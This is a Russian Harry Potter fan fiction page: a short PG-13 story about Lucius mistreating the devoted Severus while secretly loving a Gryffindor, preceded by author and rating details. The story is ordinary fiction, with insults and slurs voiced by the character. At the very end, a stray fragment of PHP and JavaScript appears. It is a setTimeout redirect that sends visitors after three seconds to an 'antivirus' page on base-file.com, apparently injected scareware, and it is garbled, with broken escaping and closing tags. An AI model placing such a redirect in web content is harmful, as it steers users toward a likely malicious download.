"Le reve impossible"

Автор: Марси
Бета: Фиона
Pairing: Люциус/Северус
Рейтинг: PG-13
Жанр: mild angst
Краткое содержание: любовный треугольник
Примечание: навеяно "Личной собственностью"

 

Я вхожу в слизеринскую гостиную. Уже почти полночь. Чертова МакГонагалл назначила мне взыскание за вечеринку, которую я закатил на прошлой неделе.

Обычное дело! Я устраиваю их каждый месяц, но этот тупица Гойл, напившись до зеленых чертей, начал ломиться в гриффиндорскую башню, задавшись целью "надрать им всем задницы". На крики портрета Жирной Тети сбежалось пол-Хогвартса, включая и эту истеричку МакГонагалл. Ей не составило труда выяснить у пьяного Гойла, кто истинный виновник произошедшего. Я уже наказал его за это, но взыскание все равно отработать пришлось. Поэтому до подземелья я добрался только сейчас.

Он, скрючившись, спит в кресле, спутанные сальные волосы спадают на лицо. Вероятно, дожидаясь меня, он заснул. На мгновение меня охватывает благодарность, и, повинуясь этому внезапному порыву, я сажусь рядом с ним, и провожу рукой по его волосам, убирая их с лица. Не открывая глаз, он шепчет: "Люциус". Я дотрагиваюсь до его губ: "Я здесь". Он открывает глаза. Я вижу, как удивление сменяется радостью. Он не ожидал проявлений нежности. Он привык к тому, что я груб, циничен и постоянно унижаю его. Подтверждая мои мысли, он тихо произносит: "Я думал, что мне это снится". Я киваю, и он, набравшись смелости, решается: "Поцелуй меня". Но я не желаю, чтобы он вообразил себе то, чего нет. Поэтому насмешливо поднимаю бровь: "С чего ты взял, что я этого хочу?" В его глазах отражаются разочарование и боль.

Да, этого я и добивался. Мне нравится обижать его, мучить, злить. И он позволяет мне делать это. Потому что любит меня. Конечно, он никогда мне в этом не признавался. Мы никогда не говорим о любви. Но я могу прочитать чувства в его глазах, потому что он не умеет прятать свои эмоции. Когда-нибудь он научится это делать, но сам я не желаю его этому учить. Да и вряд ли он когда-нибудь признается в своих чувствах, потому что боится моих насмешек, которые непременно последуют, боится, что я перестану общаться с ним, чтобы помучить его еще больше. Наконец, он боится услышать в ответ "нет".

И он прав. Я не люблю его.

Наверное, он думает, что я просто не способен любить. Что ж, я сделал немало, чтобы убедить в этом всех, кто меня знает. У Малфоев нет слабостей, это наш семейный девиз.

Но это не так. Просто мое сердце принадлежит другому.

Тому, кто никогда не будет моим. Он - гриффиндорец, а это равносильно тому, как если бы он был из другого мира.

Я не могу смотреть на то, как он проводит все свое время в компании этих гриффиндорских ублюдков - неряхи и оборванца Люпина, выскочки Блэка и размазни Петтигрю с крысиным лицом. Но больше всего я ненавижу эту шлюху, грязнокровку Эванс. Мое сердце разрывается на части, когда он обнимает ее, или близко наклоняется, что-то шепча ей на ухо. Я ненавижу ее за то, что ей достается все его внимание, вся нежность и ласка. Ей, а не мне.

Должно быть, ненависть отражается у меня на лице, потому что Северус, забыв про обиду, встревожено спрашивает: "Люциус, с тобой все в порядке?" Надев обычную маску равнодушия, я игнорирую вопрос и встаю с кресла. Не оглядываясь, я спускаюсь по лестнице в нашу спальню. Мне не нужно оглядываться, я знаю, что он идет следом.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>